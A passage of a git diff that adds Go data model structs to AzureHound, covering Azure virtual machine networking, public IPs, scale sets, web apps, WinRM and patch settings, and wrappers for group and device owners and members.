to backend address pools of load balancers. A virtual machine can reference + // backend address pools of one public and one internal load balancer. [Multiple virtual machines cannot use the + // same basic sku load balancer]. + LoadBalancerBackendAddressPools []SubResource `json:"loadBalancerBackendAddressPools,omitempty"` + + // Specifies the primary network interface in case the virtual machine has more than 1 network interface. + Primary bool `json:"primary,omitempty"` + + // Available from Api-Version 2017-03-30 onwards, it represents whether the specific ipconfiguration is IPv4 or IPv6. + // Default is taken as IPv4. Possible values are: 'IPv4' and 'IPv6'. + PrivateIPAddressVersion string `json:"privateIpAddressVersion,omitempty"` + + // The publicIPAddressConfiguration. + PublicIPAddressConfiguration VMPublicIPConfig `json:"publicIpAddressConfiguration,omitempty"` + + // Specifies the identifier of the subnet. + Subnet SubResource `json:"subnet,omitempty"` +} diff --git a/models/azure/vm_ip_tag.go b/models/azure/vm_ip_tag.go new file mode 100644 index 0000000..98cfadc --- /dev/null +++ b/models/azure/vm_ip_tag.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains the IP tag associated with the public IP address. +type VMIPTag struct { + // IP tag type. Example: FirstPartyUsage. + IPTagType string `json:"ipTagType,omitempty"` + + // IP tag associated with the public IP. Example: SQL, Storage etc. + Tag string `json:"tag,omitempty"` +} diff --git a/models/azure/vm_network_interface_config_props.go b/models/azure/vm_network_interface_config_props.go new file mode 100644 index 0000000..c19f8c3 --- /dev/null +++ b/models/azure/vm_network_interface_config_props.go @@ -0,0 +1,49 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type VMNetworkInterfaceConfigurationProperties struct { + // Specify what happens to the network interface when the VM is deleted. + DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"` + + // The dns settings to be applied on the network interfaces. + DNSSettings VMNetworkInterfaceDNSSettings `json:"dnsSettings,omitempty"` + + // The DSCP resource to be applied to the network interfaces. + DSCPConfiguration SubResource `json:"dscpConfiguration,omitempty"` + + // Specifies whether the network interface is accelerated networking-enabled. + EnabledAcceleratedNetworking bool `json:"enabledAcceleratedNetworking,omitempty"` + + // Specifies whether the network is FPGA networking-enabled + EnableFpga bool `json:"enableFpga,omitempty"` + + // Whether IP forwarding is enabled on this NIC. + EnableIPForwarding bool `json:"enableIPForwarding,omitempty"` + + // Specifies the IP configurations of the network interface. + IPConfigurations []VMNetworkInterfaceIPConfig `json:"ipConfigurations,omitempty"` + + // The network security group. + NetworkSecurityGroup SubResource `json:"networkSecurityGroup,omitempty"` + + // Specifies the primary network interface in case the virtual machine has more than one. + Primary bool `json:"primary,omitempty"` +} diff --git a/models/azure/vm_network_interface_dns_settings.go b/models/azure/vm_network_interface_dns_settings.go new file mode 100644 index 0000000..c318659 --- /dev/null +++ b/models/azure/vm_network_interface_dns_settings.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machine network configuration's DNS settings. +type VMNetworkInterfaceDNSSettings struct { + // List of DNS server IP addresses + DNSServers []string `json:"dnsServers,omitempty"` +} diff --git a/models/azure/vm_network_interface_ip_config.go b/models/azure/vm_network_interface_ip_config.go new file mode 100644 index 0000000..0a15ba0 --- /dev/null +++ b/models/azure/vm_network_interface_ip_config.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machine network profile's IP configuration. +type VMNetworkInterfaceIPConfig struct { + Properties VMIPConfigProperties `json:"properties,omitempty"` +} diff --git a/models/azure/vm_public_ip_config.go b/models/azure/vm_public_ip_config.go new file mode 100644 index 0000000..23d8b72 --- /dev/null +++ b/models/azure/vm_public_ip_config.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machines IP Configuration's PublicIPAddress configuration. +type VMPublicIPConfig struct { + // The public IP address configuration name. + Name string `json:"name,omitempty"` + + Properties VMPublicIPConfigProperties `json:"properties,omitempty"` + + // Describes the public IP Sku + Sku VMPublicIPSku `json:"sku,omitempty"` +} diff --git a/models/azure/vm_public_ip_config_props.go b/models/azure/vm_public_ip_config_props.go new file mode 100644 index 0000000..21dfc25 --- /dev/null +++ b/models/azure/vm_public_ip_config_props.go @@ -0,0 +1,43 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type VMPublicIPConfigProperties struct { + // Specify what happens to the public IP address when the VM is deleted. + DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"` + + // The dns settings to be applied on the publicIP addresses. + DNSSettings VMPublicIPDNSSettings `json:"dnsSettings,omitempty"` + + // The idle timeout of the public IP address. + IdleTimeoutInMinutes int `json:"idleTimeoutInMinutes,omitempty"` + + // The list of IP tags associated with the public IP address. + IPTags []VMIPTag `json:"ipTags,omitempty"` + + // Available from Api-Version 2019-07-01 onwards, it represents whether the specific ipconfiguration is IPv4 or IPv6. + // Default is taken as IPv4. Possible values are: 'IPv4' and 'IPv6'. + PublicIPAddressVersion string `json:"publicIpAddressVersion,omitempty"` + + // Specify the public IP allocation type. + PublicIPAllocationMethod enums.IPAllocationMethod `json:"publicIpAllocationMethod,omitempty"` +} diff --git a/models/azure/vm_public_ip_dns_settings.go b/models/azure/vm_public_ip_dns_settings.go new file mode 100644 index 0000000..ae085ac --- /dev/null +++ b/models/azure/vm_public_ip_dns_settings.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machines network configuration's DNS settings. +type VMPublicIPDNSSettings struct { + // The Domain name label prefix of the PublicIPAddress resources that will be created. The generated name label is + // the concatenation of the domain name label and vm network profile unique ID. + DomainNameLabel string `json:"domainNameLabel,omitempty"` +} diff --git a/models/azure/vm_public_ip_sku.go b/models/azure/vm_public_ip_sku.go new file mode 100644 index 0000000..9251d77 --- /dev/null +++ b/models/azure/vm_public_ip_sku.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Describes the public IP Sku +type VMPublicIPSku struct { + // Specify the public IP sku name. + Name enums.IPSku `json:"name,omitempty"` + + // Specify the public IP sky tier. + Tier enums.IPSkuTier `json:"tier,omitempty"` +} diff --git a/models/azure/vm_scale_set.go b/models/azure/vm_scale_set.go new file mode 100644 index 0000000..3d89b1f --- /dev/null +++ b/models/azure/vm_scale_set.go @@ -0,0 +1,51 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type VMScaleSet struct { + Entity + + ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Plan Plan `json:"plan,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` + Zones []string `json:"zones,omitempty"` +} + +func (s VMScaleSet) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s VMScaleSet) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/vm_size_props.go b/models/azure/vm_size_props.go new file mode 100644 index 0000000..ce7f01e --- /dev/null +++ b/models/azure/vm_size_props.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies VM Size Property settings on the virtual machine. +type VMSizeProperties struct { + // Specifies the number of vCPUs available for the VM. + // When this property is not specified in the request body the default behavior is to set it to the value of vCPUs + // available for that VM size exposed in api response of List all available virtual machine sizes in a region. + VCPUsAvailable int `json:"vCPUsAvailable,omitempty"` + + // Specifies the vCPU to physical core ratio. + // When this property is not specified in the request body the default behavior is set to the value of vCPUsPerCore + // for the VM Size exposed in api response of List all available virtual machine sizes in a region. + // Setting this property to 1 also means that hyper-threading is disabled. + VCPUsPerCore int `json:"vCPUsPerCore,omitempty"` +} diff --git a/models/azure/web_app.go b/models/azure/web_app.go new file mode 100644 index 0000000..9ef401d --- /dev/null +++ b/models/azure/web_app.go @@ -0,0 +1,50 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +// Mapped according to https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/get#site +type WebApp struct { + Entity + + Identity ManagedIdentity `json:"identity,omitempty"` + Kind string `json:"kind,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s WebApp) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s WebApp) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/web_application.go b/models/azure/web_application.go new file mode 100644 index 0000000..f379aa8 --- /dev/null +++ b/models/azure/web_application.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings for a web application. +type WebApplication struct { + // Home page or landing page of the application. + HomePageUrl string `json:"homePageUrl,omitempty"` + + // Specifies whether this web application can request tokens using the OAuth 2.0 implicit flow. + ImplicitGrantSettings ImplicitGrantSettings `json:"implicitGrantSettings,omitempty"` + + // Specifies the URL that will be used by Microsoft's authorization service to logout a user using front-channel, + // back-channel or SAML logout protocols. + LogoutUrl string `json:"logoutUrl,omitempty"` + + // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization + // codes and access tokens are sent. + RedirectUris []string `json:"redirectUris,omitempty"` +} diff --git a/models/azure/win_rm_config.go b/models/azure/win_rm_config.go new file mode 100644 index 0000000..8b37c41 --- /dev/null +++ b/models/azure/win_rm_config.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes Windows Remote Management configuration of the VM. +type WinRMConfiguration struct { + // The list of Windows Remote Management listeners. + Listeners []WinRMListener `json:"listeners,omitempty"` +} diff --git a/models/azure/win_rm_listener.go b/models/azure/win_rm_listener.go new file mode 100644 index 0000000..8544408 --- /dev/null +++ b/models/azure/win_rm_listener.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes Protocol and thumbprint of Windows Remote Management listener. +type WinRMListener struct { + // This is the URL of a certificate that has been uploaded to Key Vault as a secret. + // For adding a secret to the Key Vault, see Add a key or secret to the key vault. In this case, your certificate + // needs to be It is the Base64 encoding of the following JSON Object which is encoded in UTF-8: + // + // ```json + // { + // "data":"", + // "dataType":"pfx", + // "password":"" + // } + // ``` + // To install certificates on a virtual machine it is recommended to use the Azure Key Vault virtual machine + // extension for Linux or the Azure Key Vault virtual machine extension for Windows. + CertificateUrl string `json:"certificateUrl,omitempty"` + + // Specifies the protocol of WinRM listener. + // Possible values are: + // - http + // - https + Protocol string `json:"protocol,omitempty"` +} diff --git a/models/azure/windows_config.go b/models/azure/windows_config.go new file mode 100644 index 0000000..0cacb0b --- /dev/null +++ b/models/azure/windows_config.go @@ -0,0 +1,43 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies Windows operating system settings on the virtual machine. +type WindowsConfiguration struct { + // Specifies additional base-64 encoded XML formatted information that can be included in the Unattend.xml file, + // which is used by Windows Setup. + AdditionalUnattendContent []AdditionalUnattendContent `json:"additionalUnattendContent,omitempty"` + + // Indicates whether Automatic Updates is enabled for the Windows virtual machine. Default value is true. + // For virtual machine scale sets, this property can be updated and updates will take effect on OS reprovisioning. + EnableAutomaticUpdates bool `json:"enableAutomaticUpdates,omitempty"` + + // [Preview Feature] Specifies settings related to VM Guest Patching on Windows. + PatchSettings WindowsPatchSettings `json:"patchSettings,omitempty"` + + // Indicates whether virtual machine agent should be provisioned on the virtual machine. + // When this property is not specified in the request body, default behavior is to set it to true. This will ensure + // that VM Agent is installed on the VM so that extensions can be added to the VM later. + ProvisionVMAgent bool `json:"provisionVMAgent,omitempty"` + + // Specifies the time zone of the virtual machine. e.g. "Pacific Standard Time" + TimeZone string `json:"timeZone,omitempty"` + + // Specifies the Windows Remote Management listeners. This enables remote Windows PowerShell. + WinRM WinRMConfiguration `json:"winRM,omitempty"` +} diff --git a/models/azure/windows_patch_settings.go b/models/azure/windows_patch_settings.go new file mode 100644 index 0000000..e309056 --- /dev/null +++ b/models/azure/windows_patch_settings.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings related to VM Guest Patching on Windows. +type WindowsPatchSettings struct { + // Specifies the mode of VM Guest patch assessment for the IaaS virtual machine. + // Possible values are: + // ImageDefault - You control the timing of patch assessments on a virtual machine. + // AutomaticByPlatform - The platform will trigger periodic patch assessments. The property provisionVMAgent must be true. + AssessmentMode string `json:"assessmentMode,omitempty"` + + // Enables customers to patch their Azure VMs without requiring a reboot. + // For enableHotpatching, the 'provisionVMAgent' must be set to true and 'patchMode' must be set to 'AutomaticByPlatform'. + EnableHotpatching bool `json:"enableHotpatching,omitempty"` + + // Specifies the mode of VM Guest Patching to IaaS virtual machine or virtual machines associated to virtual machine + // scale set with OrchestrationMode as Flexible. + // Possible values are: + // Manual - You control the application of patches to a virtual machine. You do this by applying patches manually inside the VM. In this mode, automatic updates are disabled; the property WindowsConfiguration.enableAutomaticUpdates must be false + // AutomaticByOS - The virtual machine will automatically be updated by the OS. The property WindowsConfiguration.enableAutomaticUpdates must be true. + // AutomaticByPlatform - the virtual machine will automatically updated by the platform. The properties provisionVMAgent and WindowsConfiguration.enableAutomaticUpdates must be true + PatchMode string `json:"patchMode,omitempty"` +} diff --git a/models/azure/working_hours.go b/models/azure/working_hours.go new file mode 100644 index 0000000..7844674 --- /dev/null +++ b/models/azure/working_hours.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type WorkingHours struct { + // The days of the week on which the user works. + DaysOfWeek []enums.DayOfWeek `json:"daysOfWeek,omitempty"` + + // The time of the day that the user starts working. + StartTime string `json:"startTime,omitempty"` + + // The time of the day that the user stops working. + EndTime string `json:"endTime,omitempty"` + + // The time zone to which the working hours apply. + TimeZone TimeZoneBase `json:"timeZoneBase,omitempty"` +} diff --git a/models/container-registry.go b/models/container-registry.go new file mode 100644 index 0000000..c88b819 --- /dev/null +++ b/models/container-registry.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ContainerRegistry struct { + azure.ContainerRegistry + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/device-owner.go b/models/device-owner.go new file mode 100644 index 0000000..5183ce7 --- /dev/null +++ b/models/device-owner.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type DeviceOwner struct { + Owner json.RawMessage `json:"owner"` + DeviceId string `json:"deviceId"` +} + +func (s *DeviceOwner) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["deviceId"] = s.DeviceId + + if owner, err := OmitEmpty(s.Owner); err != nil { + return nil, err + } else { + output["owner"] = owner + return json.Marshal(output) + } +} + +type DeviceOwners struct { + Owners []DeviceOwner `json:"owners"` + DeviceId string `json:"deviceId"` +} diff --git a/models/device.go b/models/device.go new file mode 100644 index 0000000..fb26584 --- /dev/null +++ b/models/device.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type Device struct { + azure.Device + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/function-app.go b/models/function-app.go new file mode 100644 index 0000000..09a67f9 --- /dev/null +++ b/models/function-app.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type FunctionApp struct { + azure.FunctionApp + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/group-member.go b/models/group-member.go new file mode 100644 index 0000000..2d08eba --- /dev/null +++ b/models/group-member.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type GroupMember struct { + Member json.RawMessage `json:"member"` + GroupId string `json:"groupId"` +} + +func (s *GroupMember) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["groupId"] = s.GroupId + + if member, err := OmitEmpty(s.Member); err != nil { + return nil, err + } else { + output["member"] = member + return json.Marshal(output) + } +} + +type GroupMembers struct { + Members []GroupMember `json:"members"` + GroupId string `json:"groupId"` +} diff --git a/models/group-owner.go b/models/group-owner.go new file mode 100644 index 0000000..a7a48fe --- /dev/null +++ b/models/group-owner.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type GroupOwner struct { + Owner json.RawMessage `json:"owner"` + GroupId string `json:"groupId"` +} + +func (s *GroupOwner) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["groupId"] = s.GroupId + + if owner, err := OmitEmpty(s.Owner); err != nil { + return nil, err + } else { + output["owner"] = owner + return json.Marshal(output) + } +} + +type GroupOwners struct { + Owners []GroupOwner `json:"owners"` + GroupId string `json:"groupId"` +} diff --git a/models/group.go b/models/group.go new file mode 100644 index 0000000..48cef3a --- /dev/null +++ b/models/group.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type Group struct { + azure.Group + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/ingest-request.go b/models/ingest-request.go new file mode 100644 index 0000000..6ba0dba --- /dev/null +++ b/models/ingest-request.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +type IngestRequest struct { + Meta Meta `json:"meta"` + Data interface{} `json:"data"` +} + +type Meta struct { + Type string 